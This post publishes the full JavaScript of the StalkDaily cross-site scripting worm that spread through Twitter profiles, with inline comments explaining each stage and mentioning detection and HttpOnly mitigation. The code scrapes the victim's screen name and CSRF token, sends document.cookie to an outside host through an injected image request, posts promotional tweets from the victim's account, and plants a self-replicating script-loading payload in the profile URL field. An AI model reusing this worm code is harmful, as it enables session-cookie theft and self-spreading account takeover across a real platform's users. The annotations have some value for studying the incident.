StalkDaily.com - Twitter XSS Exploit Code

Today Twitter was compromised with a worm that infected user profiles and spread rapidly through the service. Behind the attack was a website called StalkDaily.com (Do not visit this site). Anyhow here is the code used to exploit Twitter:


HTML Code:
// Minimal cross-browser XMLHttpRequest wrapper (a generic helper, not
// worm-specific). It tries the two legacy MSXML ActiveX objects before
// the native XMLHttpRequest and returns null if none can be created.
// NOTE(review): when called with `new`, as the callers below do, a null
// return is ignored by the `new` semantics and the bare object (without
// a connect method) is produced instead.
function XHConn()
{
  var xmlhttp, bComplete = false;
  try { xmlhttp = new ActiveXObject("Msxml2.XMLHTTP"); }
  catch (e) { try { xmlhttp = new ActiveXObject("Microsoft.XMLHTTP"); }
  catch (e) { try { xmlhttp = new XMLHttpRequest(); }
  catch (e) { xmlhttp = false; }}}
  if (!xmlhttp) return null;
  // connect(sURL, sMethod, sVars, fnDone): sends one asynchronous request.
  // GET appends sVars to the URL as the query string; any other method
  // sends sVars as a form-encoded body. fnDone is invoked with the
  // request object once readyState reaches 4; bComplete ensures it fires
  // at most once per call. Returns false if open/send throws, otherwise
  // true. The HTTP status of the response is never inspected.
  this.connect = function(sURL, sMethod, sVars, fnDone)
  {
    if (!xmlhttp) return false;
    bComplete = false;
    sMethod = sMethod.toUpperCase();
    try {
      if (sMethod == "GET")
      {
        xmlhttp.open(sMethod, sURL+"?"+sVars, true);
        sVars = "";
      }
      else
      {
        xmlhttp.open(sMethod, sURL, true);
        // "Method" is not a standard HTTP request header; servers ignore it.
        xmlhttp.setRequestHeader("Method", "POST "+sURL+" HTTP/1.1");
        xmlhttp.setRequestHeader("Content-Type",
          "application/x-www-form-urlencoded");
      }
      xmlhttp.onreadystatechange = function(){
        if (xmlhttp.readyState == 4 && !bComplete)
        {
          bComplete = true;
          // Throws a TypeError if the caller omitted fnDone; by then the
          // request has already been sent, so the server side still runs.
          fnDone(xmlhttp);
        }};
      xmlhttp.send(sVars);
    }
    catch(z) { return false; }
    return true;
  };
  return this;
}
 
// Percent-encodes str as an application/x-www-form-urlencoded value.
// Wraps encodeURIComponent, then additionally encodes the characters
// ' ( ) * ~ ! that encodeURIComponent leaves untouched, rewrites "%20"
// as "+", and upper-cases the hex digits of any lowercase escapes.
function urlencode( str ) {
    var histogram = {}, tmp_arr = [];   // this outer tmp_arr is never used
    var ret = str.toString();
    
    // Replace every occurrence of `search` in `str` with `replace`.
    // split/join is used so `search` needs no regex escaping.
    var replacer = function(search, replace, str) {
        var tmp_arr = [];
        tmp_arr = str.split(search);
        return tmp_arr.join(replace);
    };
    
    // Literal sequence -> replacement, applied after encodeURIComponent.
    histogram["'"] = '%27';
    histogram['('] = '%28';
    histogram[')'] = '%29';
    histogram['*'] = '%2A';
    histogram['~'] = '%7E';
    histogram['!'] = '%21';
    histogram['%20'] = '+';   // encodeURIComponent emits %20 for a space
    
    ret = encodeURIComponent(ret);
    
    // `search` and `replace` are never declared, so in non-strict code
    // they leak as implicit globals.
    for (search in histogram) {
        replace = histogram[search];
        ret = replacer(search, replace, ret)
    }
 
    // Upper-case the hex digits of lowercase escapes (e.g. %2a -> %2A).
    // The character class is lowercase-only, so escapes that are already
    // uppercase are left as they are.
    return ret.replace(/(\%([a-z0-9]{2}))/g, function(full, m1, m2) {
        return "%"+m2.toUpperCase();
    });
    
    return ret;   // unreachable: the return above always executes first
}
 
// Stage 1 (runs immediately when the script loads): scrape the victim's
// Twitter screen name from the page's <meta name="session-user-screen_name">
// tag by regex over the serialized DOM.
var content = document.documentElement.innerHTML;
userreg = new RegExp(/<meta content="(.*)" name="session-user-screen_name"/g);   // implicit global
var username = userreg.exec(content);
username = username[1];   // throws if the meta tag is absent (exec() returned null)
 
// Stage 2: exfiltration. The cookies readable by script (document.cookie
// omits HttpOnly cookies) plus the screen name are sent to a third-party
// host as the query string of an injected <img> request; the second
// image, log.gif, presumably serves as a hit beacon. Detection angle:
// outbound requests to these two hosts originating from twitter.com
// pages. Mitigation: marking session cookies HttpOnly keeps them out of
// document.cookie entirely.
var cookie;
cookie = urlencode(document.cookie);
document.write("<img src='http://mikeyylolz.uuuq.com/x.php?c=" + cookie + "&username=" + username + "'>");
document.write("<img src='http://stalkdaily.com/log.gif'>");
 
// Stage 3 (scheduled by the setTimeout below): scrape Twitter's CSRF
// token from the page, then, riding on the victim's own logged-in
// session, post a promotional tweet and write a self-replicating XSS
// payload into the profile URL field.
function wait()
{
  var content = document.documentElement.innerHTML;
 
  // The anti-CSRF token is inlined into the page as a JS assignment;
  // this regex scrapes it. authreg is an implicit global.
  authreg = new RegExp(/twttr.form_authenticity_token = '(.*)';/g);
  var authtoken = authreg.exec(content);
  authtoken = authtoken[1];   // throws if the token is not on the page
  //alert(authtoken);
  
  // Pool of tweet texts; one is chosen at random per victim.
  var randomUpdate=new Array();
  randomUpdate[0]="Dude, www.StalkDaily.com is awesome. What's the fuss?";
  randomUpdate[1]="Join www.StalkDaily.com everyone!";
  randomUpdate[2]="Woooo, www.StalkDaily.com :)";
  randomUpdate[3]="Virus!? What? www.StalkDaily.com is legit!";
  randomUpdate[4]="Wow...www.StalkDaily.com";
  randomUpdate[5]="@twitter www.StalkDaily.com";
  
  var genRand = randomUpdate[Math.floor(Math.random()*randomUpdate.length)];
  
  updateEncode = urlencode(genRand);   // implicit global
  
  // The replication payload: a profile "url" value that breaks out of
  // the quoted attribute of the <a> tag Twitter renders it into and
  // injects a remote <script> (presumably the script this code was
  // served as), so anyone viewing the infected profile runs it in turn.
  // That the break-out works implies the field was rendered without
  // HTML attribute encoding, which is the vulnerability being exploited.
  var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');
  
  // Both requests are same-origin POSTs, so the browser attaches the
  // victim's session cookies; with the scraped token they pass the CSRF
  // check. No fnDone callback is passed, so XHConn's readystatechange
  // handler throws once the response arrives, but the requests have
  // already been sent by then.
  var ajaxConn = new XHConn();
  ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+updateEncode+"&tab=home&update=update");
  var ajaxConn1 = new XHConn();
  ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");
}
// Fires wait() after 3.25 s, presumably to let the page (and the values
// it scrapes) finish rendering. The string argument is evaluated like
// eval at fire time; passing the function reference would be equivalent.
setTimeout("wait()",3250);